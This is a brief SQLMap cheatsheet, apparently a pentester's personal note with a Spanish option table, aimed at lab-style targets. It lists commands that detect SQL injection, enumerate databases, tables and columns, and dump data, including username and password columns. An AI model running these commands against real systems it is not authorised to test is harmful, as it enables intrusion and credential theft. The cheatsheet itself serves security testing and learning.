SQLMap
SQLMap Cheatsheet
Check if injection exists
sqlmap -r Post.req
sqlmap -u http://10.10.10.10/file.php?id=1 -p id
sqlmap -u http://10.10.10.10/login.php --data="user=admin&password=admin"
Get database if injection Exists
sqlmap -r login.req --dbs
sqlmap -u http://10.10.10.10/file.php?id=1 -p id --dbs
sqlmap -u http://10.10.10.10/login.php --data="user=admin&password=admin" --dbs
Get Tables in a Database
sqlmap -r login.req -D dbname --tables
sqlmap -u http://10.10.10.10/file.php?id=1 -p id -D dbname --tables
sqlmap -u http://10.10.10.10/login.php --data="user=admin&password=admin" -D dbname --tables
Get data in a Database tables
sqlmap -r login.req -D dbname -T table_name --dump
sqlmap -u http://10.10.10.10/file.php?id=1 -p id -D dbname -T table_name --dump
sqlmap -u http://10.10.10.10/login.php --data="user=admin&password=admin" -p user -D dbname -T table_name --dump
Get Columns in a Table
sqlmap -r login.req -D dbname -T table_name --columns
sqlmap -u http://10.10.10.10/file.php?id=1 -p id -D dbname -T table_name --columns
sqlmap -u http://10.10.10.10/login.php --data="user=admin&password=admin" -p user -D dbname -T table_name --columns
Get data in a Database columns
sqlmap -r login.req -D dbname -T table_name -C username,password --dump
sqlmap -u http://10.10.10.10/file.php?id=1 -p id -D dbname -T table_name -C username,password --dump
sqlmap -u http://10.10.10.10/login.php --data="user=admin&password=admin" -p user -D dbname -T table_name -C username,password --dump
Other parameters
Flag | Description | Example |
---|---|---|
–level <int> | Aumenta los tipos de escaneo [1 - 5] | –level 5 |
–risk <int> | Aumenta el ruido y el rendimiento [1 - 3] | –risk 3 |
–batch | Acepta las preguntas con el valor por defecto automáticamente | –batch |
–string <string> | Cadena de texto que aparece cuando la consulta es satisfactoria | –string “Hola” |
–not-string <string> | Cadena de texto que aparece cuando la consulta no es satisfactoria | –not-string “Error” |
Escrito el 28-11-2021 a las 07:03 pm por creep33.